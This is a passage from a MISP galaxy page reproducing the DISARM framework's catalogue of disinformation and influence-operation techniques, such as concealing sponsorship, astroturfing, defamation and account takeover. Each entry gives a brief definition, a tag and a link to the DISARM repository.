https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.md

Report Non-Violative Opposing Content

Reporting opposing content refers to notifying and providing an instance of a violation of a platform’s guidelines and policies for conduct on the platform. In addition to simply reporting the content, an operation may leverage copyright regulations to trick social media and web platforms into removing opposing content by manipulating the content to appear in violation of copyright laws. Reporting opposing content facilitates the suppression of contradictory information and allows operation narratives to take priority in the information space.

The tag is: misp-galaxy:disarm-techniques="Report Non-Violative Opposing Content"

Table 1467. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.001.md

Goad People into Harmful Action (Stop Hitting Yourself)

Goad people into actions that violate terms of service or will lead to having their content or accounts taken down.

The tag is: misp-galaxy:disarm-techniques="Goad People into Harmful Action (Stop Hitting Yourself)"

Table 1468. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.002.md

Exploit Platform TOS/Content Moderation

Exploit Platform TOS/Content Moderation

The tag is: misp-galaxy:disarm-techniques="Exploit Platform TOS/Content Moderation"

Table 1469. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0124.003.md

Platform Filtering

Platform filtering refers to the decontextualization of information as claims cross platforms (from Joan Donovan https://www.hks.harvard.edu/publications/disinformation-design-use-evidence-collages-and-platform-filtering-media-manipulation)

The tag is: misp-galaxy:disarm-techniques="Platform Filtering"

Table 1470. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0125.md

Encourage Attendance at Events

The operation encourages attendance at an existing real-world event.

The tag is: misp-galaxy:disarm-techniques="Encourage Attendance at Events"

Table 1471. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.md

Call to Action to Attend

Call to action to attend an event.

The tag is: misp-galaxy:disarm-techniques="Call to Action to Attend"

Table 1472. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.001.md

Facilitate Logistics or Support for Attendance

Facilitate logistics or support for travel, food, housing, etc.

The tag is: misp-galaxy:disarm-techniques="Facilitate Logistics or Support for Attendance"

Table 1473. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0126.002.md

Physical Violence

Physical violence refers to the use of force to injure, abuse, damage, or destroy. An influence operation may conduct or encourage physical violence to discourage opponents from promoting conflicting content or draw attention to operation narratives using shock value.

The tag is: misp-galaxy:disarm-techniques="Physical Violence"

Table 1474. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.md

Conduct Physical Violence

An influence operation may directly conduct physical violence to achieve campaign goals.

The tag is: misp-galaxy:disarm-techniques="Conduct Physical Violence"

Table 1475. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.001.md

Encourage Physical Violence

An influence operation may encourage others to engage in physical violence to achieve campaign goals.

The tag is: misp-galaxy:disarm-techniques="Encourage Physical Violence"

Table 1476. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0127.002.md

Conceal Information Assets

Conceal the identity or provenance of campaign information assets such as accounts, channels, pages etc. to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Information Assets"

Table 1477. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.md

Use Pseudonyms

An operation may use pseudonyms, or fake names, to mask the identity of operational accounts, channels, pages etc., publish anonymous content, or otherwise use falsified personas to conceal the identity of the operation. An operation may coordinate pseudonyms across multiple platforms, for example, by writing an article under a pseudonym and then posting a link to the article on social media on an account, channel, or page with the same falsified name.

The tag is: misp-galaxy:disarm-techniques="Use Pseudonyms"

Table 1478. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.001.md

Conceal Network Identity

Concealing network identity aims to hide the existence of an influence operation’s network completely. Unlike concealing sponsorship, concealing network identity denies the existence of any sort of organisation.

The tag is: misp-galaxy:disarm-techniques="Conceal Network Identity"

Table 1479. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.002.md

Distance Reputable Individuals from Operation

Distancing reputable individuals from the operation occurs when enlisted individuals, such as celebrities or subject matter experts, actively disengage themselves from operation activities and messaging. Individuals may distance themselves from the operation by deleting old posts or statements, unfollowing operation information assets, or otherwise detaching themselves from the operation’s timeline. An influence operation may want reputable individuals to distance themselves from the operation to reduce operation exposure, particularly if the operation aims to remove all evidence.

The tag is: misp-galaxy:disarm-techniques="Distance Reputable Individuals from Operation"

Table 1480. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.003.md

Launder Information Assets

Laundering occurs when an influence operation acquires control of previously legitimate information assets such as accounts, channels, pages etc. from third parties through sale or exchange and often in contravention of terms of use. Influence operations use laundered assets to reach target audience members from within an existing information community and to complicate attribution.

The tag is: misp-galaxy:disarm-techniques="Launder Information Assets"

Table 1481. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.004.md

Change Names of Information Assets

Changing names or brand names of information assets such as accounts, channels, pages etc. An operation may change the names or brand names of its assets throughout an operation to avoid detection or alter the names of newly acquired or repurposed assets to fit operational narratives.

The tag is: misp-galaxy:disarm-techniques="Change Names of Information Assets"

Table 1482. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0128.005.md

Conceal Operational Activity

Conceal the campaign’s operational activity to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Operational Activity"

Table 1483. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.md

Generate Content Unrelated to Narrative

An influence operation may mix its own operation content with legitimate news or external unrelated content to disguise operational objectives, narratives, or existence. For example, an operation may generate "lifestyle" or "cuisine" content alongside regular operation content.

The tag is: misp-galaxy:disarm-techniques="Generate Content Unrelated to Narrative"

Table 1484. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.002.md

Break Association with Content

Breaking association with content occurs when an influence operation actively separates itself from its own content. An influence operation may break association with content by unfollowing, unliking, or unsharing its content, removing attribution from its content, or otherwise taking actions that distance the operation from its messaging. An influence operation may break association with its content to complicate attribution or regain credibility for a new operation.

The tag is: misp-galaxy:disarm-techniques="Break Association with Content"

Table 1485. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.003.md

Delete URLs

URL deletion occurs when an influence operation completely removes its website registration, rendering the URL inaccessible. An influence operation may delete its URLs to complicate attribution or remove online documentation that the operation ever occurred.

The tag is: misp-galaxy:disarm-techniques="Delete URLs"

Table 1486. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.004.md

Coordinate on Encrypted/Closed Networks

Coordinate on encrypted/closed networks.

The tag is: misp-galaxy:disarm-techniques="Coordinate on Encrypted/Closed Networks"

Table 1487. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.005.md

Deny Involvement

Without "smoking gun" proof (and even with proof), the incident creator can or will deny involvement. This technique also leverages the attacker advantages outlined in "Demand insurmountable proof", specifically the asymmetric disadvantage for truth-tellers in a "firehose of misinformation" environment.

The tag is: misp-galaxy:disarm-techniques="Deny Involvement"

Table 1488. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.006.md

Delete Accounts/Account Activity

Deleting accounts and account activity occurs when an influence operation removes its online social media assets, including social media accounts, posts, likes, comments, and other online artefacts. An influence operation may delete its accounts and account activity to complicate attribution or remove online documentation that the operation ever occurred.

The tag is: misp-galaxy:disarm-techniques="Delete Accounts/Account Activity"

Table 1489. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.007.md

Redirect URLs

An influence operation may redirect its falsified or typosquatted URLs to legitimate websites to increase the operation’s appearance of legitimacy, complicate attribution, and avoid detection.

The tag is: misp-galaxy:disarm-techniques="Redirect URLs"

Table 1490. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.008.md

Remove Post Origins

Removing post origins refers to the elimination of evidence that indicates the initial source of operation content, often to complicate attribution. An influence operation may remove post origins by deleting watermarks, renaming files, or removing embedded links in its content.

The tag is: misp-galaxy:disarm-techniques="Remove Post Origins"

Table 1491. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.009.md

Misattribute Activity

Misattributed activity refers to incorrectly attributed operation activity. For example, a state-sponsored influence operation may conduct operation activity in a way that mimics another state so that external entities misattribute activity to the incorrect state. An operation may misattribute its activities to complicate attribution, avoid detection, or frame an adversary for negative behaviour.

The tag is: misp-galaxy:disarm-techniques="Misattribute Activity"

Table 1492. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0129.010.md

Conceal Infrastructure

Conceal the campaign’s infrastructure to avoid takedown and attribution.

The tag is: misp-galaxy:disarm-techniques="Conceal Infrastructure"

Table 1493. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.md

Conceal Sponsorship

Concealing sponsorship aims to mislead or obscure the identity of the hidden sponsor behind an operation rather than the entity publicly running the operation. Operations that conceal sponsorship may maintain visible falsified groups, news outlets, non-profits, or other organisations, but seek to mislead or obscure the identity of whoever is sponsoring, funding, or otherwise supporting these entities. Influence operations may use a variety of techniques to mask the location of their social media accounts to complicate attribution and conceal evidence of foreign interference. Operation accounts may set their location to a false place, often the location of the operation’s target audience, and post in the region’s language.

The tag is: misp-galaxy:disarm-techniques="Conceal Sponsorship"

Table 1494. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.001.md

Utilise Bulletproof Hosting

Hosting refers to services through which storage and computing resources are provided to an individual or organisation for the accommodation and maintenance of one or more websites and related services. Services may include web hosting, file sharing, and email distribution. Bulletproof hosting refers to services provided by an entity, such as a domain hosting or web hosting firm, that allows its customer considerable leniency in use of the service. An influence operation may utilise bulletproof hosting to maintain continuity of service for suspicious, illegal, or disruptive operation activities that stricter hosting services would limit, report, or suspend.

The tag is: misp-galaxy:disarm-techniques="Utilise Bulletproof Hosting"

Table 1495. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.002.md

Use Shell Organisations

Use Shell Organisations to conceal sponsorship.

The tag is: misp-galaxy:disarm-techniques="Use Shell Organisations"

Table 1496. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.003.md

Use Cryptocurrency

Use cryptocurrency to conceal sponsorship. Examples include Bitcoin, Monero, and Ethereum.

The tag is: misp-galaxy:disarm-techniques="Use Cryptocurrency"

Table 1497. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.004.md

Obfuscate Payment

Obfuscate Payment

The tag is: misp-galaxy:disarm-techniques="Obfuscate Payment"

Table 1498. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0130.005.md

Exploit TOS/Content Moderation

Exploiting weaknesses in platforms' terms of service and content moderation policies to avoid takedowns and platform actions.

The tag is: misp-galaxy:disarm-techniques="Exploit TOS/Content Moderation"

Table 1499. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.md

Legacy Web Content

Make incident content visible for a long time, e.g. by exploiting platform terms of service, or placing it where it’s hard to remove or unlikely to be removed.

The tag is: misp-galaxy:disarm-techniques="Legacy Web Content"

Table 1500. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.001.md

Post Borderline Content

Post Borderline Content

The tag is: misp-galaxy:disarm-techniques="Post Borderline Content"

Table 1501. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0131.002.md

Measure Performance

A metric used to determine the accomplishment of actions. “Are the actions being executed as planned?”

The tag is: misp-galaxy:disarm-techniques="Measure Performance"

Table 1502. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.md

People Focused

Measure the performance of individuals in achieving campaign goals.

The tag is: misp-galaxy:disarm-techniques="People Focused"

Table 1503. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.001.md

Content Focused

Measure the performance of campaign content.

The tag is: misp-galaxy:disarm-techniques="Content Focused"

Table 1504. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.002.md

View Focused

View Focused

The tag is: misp-galaxy:disarm-techniques="View Focused"

Table 1505. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0132.003.md

Measure Effectiveness

A metric used to measure a current system state. “Are we on track to achieve the intended new system state within the planned timescale?”

The tag is: misp-galaxy:disarm-techniques="Measure Effectiveness"

Table 1506. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.md

Behaviour Changes

Monitor and evaluate behaviour changes from misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Behaviour Changes"

Table 1507. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.001.md

Content

Measure current system state with respect to the effectiveness of campaign content.

The tag is: misp-galaxy:disarm-techniques="Content"

Table 1508. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.002.md

Awareness

Measure current system state with respect to the effectiveness of influencing awareness.

The tag is: misp-galaxy:disarm-techniques="Awareness"

Table 1509. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.003.md

Knowledge

Measure current system state with respect to the effectiveness of influencing knowledge.

The tag is: misp-galaxy:disarm-techniques="Knowledge"

Table 1510. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.004.md

Action/Attitude

Measure current system state with respect to the effectiveness of influencing action/attitude.

The tag is: misp-galaxy:disarm-techniques="Action/Attitude"

Table 1511. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0133.005.md

Measure Effectiveness Indicators (or KPIs)

Ensuring that Key Performance Indicators are identified and tracked, so that the performance and effectiveness of campaigns, and elements of campaigns, can be measured, during and after their execution.

The tag is: misp-galaxy:disarm-techniques="Measure Effectiveness Indicators (or KPIs)"

Table 1512. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.md

Message Reach

Monitor and evaluate message reach in misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Message Reach"

Table 1513. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.001.md

Social Media Engagement

Monitor and evaluate social media engagement in misinformation incidents.

The tag is: misp-galaxy:disarm-techniques="Social Media Engagement"

Table 1514. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0134.002.md

Undermine

Weaken, debilitate, or subvert a target or their actions. An influence operation may be designed to disparage an opponent; sabotage an opponent’s systems or processes; compromise an opponent’s relationships or support system; impair an opponent’s capability; or thwart an opponent’s initiative.

The tag is: misp-galaxy:disarm-techniques="Undermine"

Table 1515. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.md

Smear

Denigrate, disparage, or discredit an opponent. This is a common tactical objective in political campaigns with a larger strategic goal. It differs from efforts to harm a target through defamation. If there is no ulterior motive and the sole aim is to cause harm to the target, then choose sub-technique “Defame” of technique “Cause Harm” instead.

The tag is: misp-galaxy:disarm-techniques="Smear"

Table 1516. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.001.md

Thwart

Prevent the successful outcome of a policy, operation, or initiative. Actors conduct influence operations to stymie or foil proposals, plans, or courses of action which are not in their interest.

The tag is: misp-galaxy:disarm-techniques="Thwart"

Table 1517. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.002.md

Subvert

Sabotage, destroy, or damage a system, process, or relationship. The classic example is the Soviet strategy of “active measures” involving deniable covert activities such as political influence, the use of front organisations, the orchestration of domestic unrest, and the spread of disinformation.

The tag is: misp-galaxy:disarm-techniques="Subvert"

Table 1518. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.003.md

Polarise

To cause a target audience to divide into two completely opposing groups. This is a special case of subversion. To divide and conquer is an age-old approach to subverting and overcoming an enemy.

The tag is: misp-galaxy:disarm-techniques="Polarise"

Table 1519. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0135.004.md

Cultivate Support

Grow or maintain the base of support for the actor, ally, or action. This includes hard core recruitment, managing alliances, and generating or maintaining sympathy among a wider audience, including reputation management and public relations. Sub-techniques assume support for actor (self) unless otherwise specified.

The tag is: misp-galaxy:disarm-techniques="Cultivate Support"

Table 1520. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.md

Defend Reputaton

Preserve a positive perception in the public’s mind following an accusation or adverse event. When accused of a wrongful act, an actor may engage in denial, counter accusations, whataboutism, or conspiracy theories to distract public attention and attempt to maintain a positive image.

The tag is: misp-galaxy:disarm-techniques="Defend Reputaton"

Table 1521. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.001.md

Justify Action

To convince others to exonerate you of a perceived wrongdoing. When an actor finds it untenable to deny doing something, they may attempt to exonerate themselves with disinformation which claims the action was reasonable. This is a special case of “Defend Reputation”.

The tag is: misp-galaxy:disarm-techniques="Justify Action"

Table 1522. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.002.md

Energise Supporters

Raise the morale of those who support the organisation or group. Invigorate constituents with zeal for the mission or activity. Terrorist groups, political movements, and cults may indoctrinate their supporters with ideologies that are based on warped versions of religion or cause harm to others.

The tag is: misp-galaxy:disarm-techniques="Energise Supporters"

Table 1523. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.003.md

Boost Reputation

Elevate the estimation of the actor in the public’s mind. Improve their image or standing. Public relations professionals use persuasive overt communications to achieve this goal; manipulators use covert disinformation.

The tag is: misp-galaxy:disarm-techniques="Boost Reputation"

Table 1524. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.004.md

Cultvate Support for Initiative

Elevate or fortify the public backing for a policy, operation, or idea. Domestic and foreign actors can use artificial means to fabricate or amplify public support for a proposal or action.

The tag is: misp-galaxy:disarm-techniques="Cultvate Support for Initiative"

Table 1525. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.005.md

Cultivate Support for Ally

Elevate or fortify the public backing for a partner. Governments may interfere in other countries’ elections by covertly favouring a party or candidate aligned with their interests. They may also mount an influence operation to bolster the reputation of an ally under attack.

The tag is: misp-galaxy:disarm-techniques="Cultivate Support for Ally"

Table 1526. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.006.md

Recruit Members

Motivate followers to join or subscribe as members of the team. Organisations may mount recruitment drives that use propaganda to entice sympathisers to sign up.

The tag is: misp-galaxy:disarm-techniques="Recruit Members"

Table 1527. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.007.md

Increase Prestige

Improve personal standing within a community. Gain fame, approbation, or notoriety. Conspiracy theorists, those with special access, and ideologues can gain prominence in a community by propagating disinformation, leaking confidential documents, or spreading hate.

The tag is: misp-galaxy:disarm-techniques="Increase Prestige"

Table 1528. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0136.008.md

Make Money

Profit from disinformation, conspiracy theories, or online harm. In some cases, the sole objective is financial gain, in other cases the objective is both financial and political. Making money may also be a way to sustain a political campaign.

The tag is: misp-galaxy:disarm-techniques="Make Money"

Table 1529. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.md

Generate Ad Revenue

Earn income from digital advertisements published alongside inauthentic content. Conspiratorial, false, or provocative content drives internet traffic. Content owners earn money from impressions of, or clicks on, or conversions of ads published on their websites, social media profiles, or streaming services, or ads published when their content appears in search engine results. Fraudsters simulate impressions, clicks, and conversions, or they spin up inauthentic sites or social media profiles just to generate ad revenue. Conspiracy theorists and political operators generate ad revenue as a byproduct of their operation or as a means of sustaining their campaign.

The tag is: misp-galaxy:disarm-techniques="Generate Ad Revenue"

Table 1530. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.001.md

Scam

Defraud a target or trick a target into doing something that benefits the attacker. A typical scam is where a fraudster convinces a target to pay for something without the intention of ever delivering anything in return. Alternatively, the fraudster may promise benefits which never materialise, such as a fake cure. Criminals often exploit a fear or crisis or generate a sense of urgency. They may use deepfakes to impersonate authority figures or individuals in distress.

The tag is: misp-galaxy:disarm-techniques="Scam"

Table 1531. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.002.md

Raise Funds

Solicit donations for a cause. Popular conspiracy theorists can attract financial contributions from their followers. Fighting back against the establishment is a popular crowdfunding narrative.

The tag is: misp-galaxy:disarm-techniques="Raise Funds"

Table 1532. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.003.md

Sell Items under False Pretences

Offer products for sale under false pretences. Campaigns may hijack or create causes built on disinformation to sell promotional merchandise. Or charlatans may amplify victims’ unfounded fears to sell them items of questionable utility such as supplements or survival gear.

The tag is: misp-galaxy:disarm-techniques="Sell Items under False Pretences"

Table 1533. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.004.md

Extort

Coerce money or favours from a target by threatening to expose or corrupt information. Ransomware criminals typically demand money. Intelligence agencies demand national secrets. Sexual predators demand favours. The leverage may be critical, sensitive, or embarrassing information.

The tag is: misp-galaxy:disarm-techniques="Extort"

Table 1534. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.005.md

Manipulate Stocks

Artificially inflate or deflate the price of stocks or other financial instruments and then trade on these to make profit. The most common securities fraud schemes are called “pump and dump” and “poop and scoop”.

The tag is: misp-galaxy:disarm-techniques="Manipulate Stocks"

Table 1535. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0137.006.md

Motivate to Act

Persuade, impel, or provoke the target to behave in a specific manner favourable to the attacker. Some common behaviours are joining, subscribing, voting, buying, demonstrating, fighting, retreating, resigning, boycotting.

The tag is: misp-galaxy:disarm-techniques="Motivate to Act"

Table 1536. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.md

Encourage

Inspire, animate, or exhort a target to act. An actor can use propaganda, disinformation, or conspiracy theories to stimulate a target to act in its interest.

The tag is: misp-galaxy:disarm-techniques="Encourage"

Table 1537. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.001.md

Provoke

Instigate, incite, or arouse a target to act. Social media manipulators exploit moral outrage to propel targets to spread hate, take to the streets to protest, or engage in acts of violence.

The tag is: misp-galaxy:disarm-techniques="Provoke"

Table 1538. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.002.md

Compel

Force target to take an action or to stop taking an action it has already started. Actors can use the threat of reputational damage alongside military or economic threats to compel a target.

The tag is: misp-galaxy:disarm-techniques="Compel"

Table 1539. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0138.003.md

Dissuade from Acting

Discourage, deter, or inhibit the target from actions which would be unfavourable to the attacker. The actor may want the target to refrain from voting, buying, fighting, or supplying.

The tag is: misp-galaxy:disarm-techniques="Dissuade from Acting"

Table 1540. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.md

Discourage

To make a target disinclined or reluctant to act. Manipulators use disinformation to cause targets to question the utility, legality, or morality of taking an action.

The tag is: misp-galaxy:disarm-techniques="Discourage"

Table 1541. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.001.md

Silence

Intimidate or incentivise target into remaining silent or prevent target from speaking out. A threat actor may cow a target into silence as a special case of deterrence. Or they may buy the target’s silence. Or they may repress or restrict the target’s speech.

The tag is: misp-galaxy:disarm-techniques="Silence"

Table 1542. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.002.md

Deter

Prevent target from taking an action for fear of the consequences. Deterrence occurs in the mind of the target, who fears they will be worse off if they take an action than if they don’t. When making threats, aggressors may bluff, feign irrationality, or engage in brinksmanship.

The tag is: misp-galaxy:disarm-techniques="Deter"

Table 1543. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0139.003.md

Cause Harm

Persecute, malign, or inflict pain upon a target. The objective of a campaign may be to cause fear or emotional distress in a target. In some cases, harm is instrumental to achieving a primary objective, as in coercion, repression, or intimidation. In other cases, harm may be inflicted for the satisfaction of the perpetrator, as in revenge or sadistic cruelty.

The tag is: misp-galaxy:disarm-techniques="Cause Harm"

Table 1544. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.md

Defame

Attempt to damage the target’s personal reputation by impugning their character. This can range from subtle attempts to misrepresent or insinuate, to obvious attempts to denigrate or disparage, to blatant attempts to malign or vilify. Slander applies to oral expression. Libel applies to written or pictorial material. Defamation is often carried out by online trolls. The sole aim here is to cause harm to the target. If the threat actor uses defamation as a means of undermining the target, then choose sub-technique “Smear” of technique “Undermine” instead.

The tag is: misp-galaxy:disarm-techniques="Defame"

Table 1545. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.001.md

Intimidate

Coerce, bully, or frighten the target. An influence operation may use intimidation to compel the target to act against their will. Or the goal may be to frighten or even terrify the target into silence or submission. In some cases, the goal is simply to make the victim suffer.

The tag is: misp-galaxy:disarm-techniques="Intimidate"

Table 1546. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.002.md

Spread Hate

Publish and/or propagate demeaning, derisive, or humiliating content targeting an individual or group of individuals with the intent to cause emotional, psychological, or physical distress. Hate speech can cause harm directly or incite others to harm the target. It often aims to stigmatise the target by singling out immutable characteristics such as colour, race, religion, national or ethnic origin, gender, gender identity, sexual orientation, age, disease, or mental or physical disability. Thus, promoting hatred online may involve racism, antisemitism, Islamophobia, xenophobia, sexism, misogyny, homophobia, transphobia, ageism, ableism, or any combination thereof. Motivations for hate speech range from group preservation to ideological superiority to the unbridled infliction of suffering.

The tag is: misp-galaxy:disarm-techniques="Spread Hate"

Table 1547. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0140.003.md

Acquire Compromised Asset

Threat Actors may take over existing assets not owned by them through nefarious means, such as using technical exploits, hacking, purchasing compromised accounts from the dark web, or social engineering.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Asset"

Table 1548. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.md

Acquire Compromised Account

Threat Actors can take over existing users’ accounts to distribute campaign content. 

The actor may maintain the asset’s previous identity to capitalise on the perceived legitimacy its previous owner had cultivated.

The actor may completely rebrand the account to exploit its existing reach, or rely on the account’s history to avoid the more stringent automated content moderation rules applied to new accounts.

See also [Mitre ATT&CK’s T1586 Compromise Accounts](https://attack.mitre.org/techniques/T1586/) for more technical information on how threat actors may achieve this objective.

This Technique was previously called Compromise Legitimate Accounts, and used the ID T0011.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Account"

Table 1549. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.001.md

Acquire Compromised Website

Threat Actors may take over existing websites to publish or amplify inauthentic narratives. This includes the defacement of websites, and cases where websites’ personas are maintained to add credence to threat actors’ narratives.

See also [Mitre ATT&CK’s T1584 Compromise Infrastructure](https://attack.mitre.org/techniques/T1584/) for more technical information on how threat actors may achieve this objective.

The tag is: misp-galaxy:disarm-techniques="Acquire Compromised Website"

Table 1550. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0141.002.md

Fabricate Grassroots Movement

This technique, sometimes known as "astroturfing", occurs when an influence operation disguises itself as a grassroots movement or organisation that supports operation narratives. 

Astroturfing aims to increase the appearance of popular support for an evolving grassroots movement in contrast to "Utilise Butterfly Attacks", which aims to discredit an existing grassroots movement. 

This Technique was previously called Astroturfing, and used the ID T0099.001.

The tag is: misp-galaxy:disarm-techniques="Fabricate Grassroots Movement"

Table 1551. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0142.md

Election guidelines

Universal Development and Security Guidelines as Applicable to Election Technology.

Election guidelines is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

NIS Cooperation Group

Tampering with registrations

